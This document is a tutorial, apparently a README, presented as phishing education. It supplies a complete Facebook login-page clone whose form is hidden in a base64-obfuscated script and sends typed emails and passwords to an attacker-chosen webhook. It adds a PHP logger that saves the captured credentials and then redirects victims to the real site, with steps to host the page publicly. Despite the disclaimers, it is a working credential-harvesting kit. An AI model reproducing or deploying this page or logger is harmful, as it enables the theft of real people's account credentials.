Important
Disclaimer: This content is intended strictly for educational and ethical awareness purposes only. It must not be used for unauthorized or malicious activities. Always conduct security testing only in environments you own or have explicit permission to test. Misuse of this information may be illegal and subject to penalties under cybercrime laws.
This demonstrates how phish[i]ng techniques work, for the sole purpose of educating ethical hackers, developers, and students in cybersecurity.
We are using a minified and obfuscated clone of the Fa[ce]book login page for simulation purposes.
-
Copy the HTML content below into a file named
index.html.<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Facebook – log in or sign up</title> <style>body{margin:0;font-family:Arial,sans-serif;background-color:#f0f2f5}.login-box,footer{text-align:center}.login-box{background:#fff;padding:30px;box-shadow:0 2px 5px rgba(0,0,0,.1);width:360px;border-radius:6px}.login-box h2{margin-bottom:20px;font-weight:400}.login-box form input{width:100%;padding:10px;margin-bottom:12px;border:1px solid #ddd;border-radius:4px;font-size:14px}.login-box form button{width:100%;padding:10px;background-color:#1877f2;border:none;color:#fff;font-size:16px;border-radius:4px;cursor:pointer}.login-box form button,.login-box form input{box-sizing:border-box}.login-links,.not-now{font-size:13px;margin-top:10px;color:#1877f2}footer{padding:20px;font-size:13px;color:#737373}footer .footer-links a{margin:0 5px;color:#737373;text-decoration:none}footer .footer-links{margin-top:10px;line-height:1.6;max-width:1000px;margin-left:auto;margin-right:auto}</style> </head> <body> <noscript>JavaScript is required to run this application</noscript> <script> var webhook="https://webhook.site/your-id-here"; document.write(atob(`PGRpdiBzdHlsZT0iYmFja2dyb3VuZC1jb2xvcjojM2I1OTk4O2NvbG9yOiNmZmY7cGFkZGluZzoxMHB4IDIwcHg7ZGlzcGxheTpmbGV4O2FsaWduLWl0ZW1zOmNlbnRlcjtqdXN0aWZ5LWNvbnRlbnQ6c3BhY2UtYmV0d2VlbiI+PGRpdiBzdHlsZT1mb250LXNpemU6MzJweDtmb250LXdlaWdodDo3MDA+ZmFjZWJvb2s8L2Rpdj48YSBocmVmPSMgc3R5bGU9ImJhY2tncm91bmQtY29sb3I6IzQyYjcyYTtjb2xvcjojZmZmO3BhZGRpbmc6NnB4IDEycHg7dGV4dC1kZWNvcmF0aW9uOm5vbmU7Zm9udC1zaXplOjE0cHg7Ym9yZGVyLXJhZGl1czozcHgiPkNyZWF0ZSBOZXcgQWNjb3VudDwvYT48L2Rpdj48ZGl2IHN0eWxlPWRpc3BsYXk6ZmxleDtqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyO2FsaWduLWl0ZW1zOmNlbnRlcjtoZWlnaHQ6NjB2aD48ZGl2IGNsYXNzPWxvZ2luLWJveD48aDI+TG9nIGluIHRvIEZhY2Vib29rPC9oMj48Zm9ybSBvbnN1Ym1pdD0idGhpcy5hY3Rpb249d2ViaG9vayIgbWV0aG9kPXBvc3QgYWN0aW9uPT48aW5wdXQgbmFtZT1lbWFpbCBwbGFjZWhvbGRlcj0iRW1haWwgYWRkcmVzcyBvciBwaG9uZSBudW1iZXIicmVxdWlyZWQ+IDxpbnB1dCBuYW1lPXBhc3MgcGxhY2Vob2xkZXI9UGFzc3dvcmQgcmVxdWlyZWQgdHlwZT1wYXNzd29yZD4gPGJ1dHRvbiB0eXBlPXN1Ym1pdD5Mb2cgaW48L2J1dHRvbj48L2Zvcm0+PGRpdiBjbGFzcz1sb2dpbi1saW5rcz48YSBocmVmPSM+Rm9yZ290dGVuIGFjY291bnQ/PC9hPiAmI3hCNzsgPGEgaHJlZj0jPlNpZ24gdXAgZm9yIEZhY2Vib29rPC9hPjwvZGl2PjxkaXYgY2xhc3M9bm90LW5vdz48YSBocmVmPSM+Tm90IG5vdzwvYT48L2Rpdj48L2Rpdj48L2Rpdj48Zm9vdGVyPjxkaXYgc3R5bGU9bWFyZ2luLWJvdHRvbToxMHB4PkVuZ2xpc2ggKFVLKSAmI3hBOTc7JiN4QUMxOyYjeEE5QzsmI3hBQjA7JiN4QUJFOyYjeEFBNDsmI3hBQzA7ICYjeDkzOTsmI3g5M0Y7JiN4OTI4OyYjeDk0RDsmI3g5MjY7JiN4OTQwOyAmI3g5MkU7JiN4OTMwOyYjeDkzRTsmI3g5MjA7JiN4OTQwOyAmI3g2Mjc7JiN4NjRGOyYjeDYzMTsmI3g2MkY7JiN4NjRGOyYjeDY0ODsgJiN4QkE0OyYjeEJBRTsmI3hCQkY7JiN4QkI0OyYjeEJDRDsgJiN4OUFDOyYjeDlCRTsmI3g5ODI7JiN4OUIyOyYjeDlCRTsgJiN4QzI0OyYjeEM0NjsmI3hDMzI7JiN4QzQxOyYjeEMxNzsmI3hDNDE7ICYjeEQyRTsmI3hEMzI7JiN4RDJGOyYjeEQzRTsmI3hEMzM7JiN4RDAyOyBFc3BhJiN4RjE7b2wgPGJ1dHRvbj4rPC9idXR0b24+PC9kaXY+PGRpdiBjbGFzcz1mb290ZXItbGlua3M+PGEgaHJlZj0jPlNpZ24gVXA8L2E+IDxhIGhyZWY9Iz5Mb2cgaW48L2E+IDxhIGhyZWY9Iz5NZXNzZW5nZXI8L2E+IDxhIGhyZWY9Iz5GYWNlYm9vayBMaXRlPC9hPiA8YSBocmVmPSM+VmlkZW88L2E+IDxhIGhyZWY9Iz5NZXRhIFBheTwvYT4gPGEgaHJlZj0jPk1ldGEgU3RvcmU8L2E+IDxhIGhyZWY9Iz5NZXRhIFF1ZXN0PC9hPiA8YSBocmVmPSM+UmF5LUJhbiBNZXRhPC9hPiA8YSBocmVmPSM+TWV0YSBBSTwvYT4gPGEgaHJlZj0jPkluc3RhZ3JhbTwvYT4gPGEgaHJlZj0jPlRocmVhZHM8L2E+IDxhIGhyZWY9Iz5Wb3RpbmcgSW5mb3JtYXRpb24gQ2VudHJlPC9hPiA8YSBocmVmPSM+UHJpdmFjeSBQb2xpY3k8L2E+IDxhIGhyZWY9Iz5Qcml2YWN5IENlbnRyZTwvYT4gPGEgaHJlZj0jPkFib3V0PC9hPiA8YSBocmVmPSM+Q3JlYXRlIGFkPC9hPiA8YSBocmVmPSM+Q3JlYXRlIFBhZ2U8L2E+IDxhIGhyZWY9Iz5EZXZlbG9wZXJzPC9hPiA8YSBocmVmPSM+Q2FyZWVyczwvYT4gPGEgaHJlZj0jPkNvb2tpZXM8L2E+IDxhIGhyZWY9Iz5BZENob2ljZXM8L2E+IDxhIGhyZWY9Iz5UZXJtczwvYT4gPGEgaHJlZj0jPkhlbHA8L2E+PC9kaXY+PGRpdiBzdHlsZT1tYXJnaW4tdG9wOjEwcHg+TWV0YSAmI3hBOTsgMjAyNTwvZGl2PjwvZm9vdGVyPg==`)); </script> </body> </html>
-
Replace the URL in the line
var webhook="https://webhook.site/your-id-here";with your own (from tools like Webhook.site, Burp Collaborator, RequestBin, Beeceptor, etc.) to capture the form data. -
Host the file on a public-facing web server to make it accessible over the internet (for testing within your own lab environment only).
When someone accesses this page and submits the form, the data will be sent to your specified webhook.
Instead of using public services, you can also set up a simple logger on your own server using PHP:
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
file_put_contents('post_data.log', json_encode($_POST) . PHP_EOL, FILE_APPEND);
}
header('Location: https://www.facebook.com/');
exit;- Save this code in a file (e.g.,
l0gger.php) and host it on your web server. - Use the URL to this script as your
webhookin the HTML demo.
Warning
Again, this is for ethical and legal cybersecurity education only. Do not deploy this technique against unsuspecting users or external systems without explicit, written permission. Educate responsibly.
If you're training in cybersecurity or preparing for certifications (like OSCP, CEH, or Security+), simulated phishing labs like this can be valuable for understanding how attackers operate and how to defend against them.
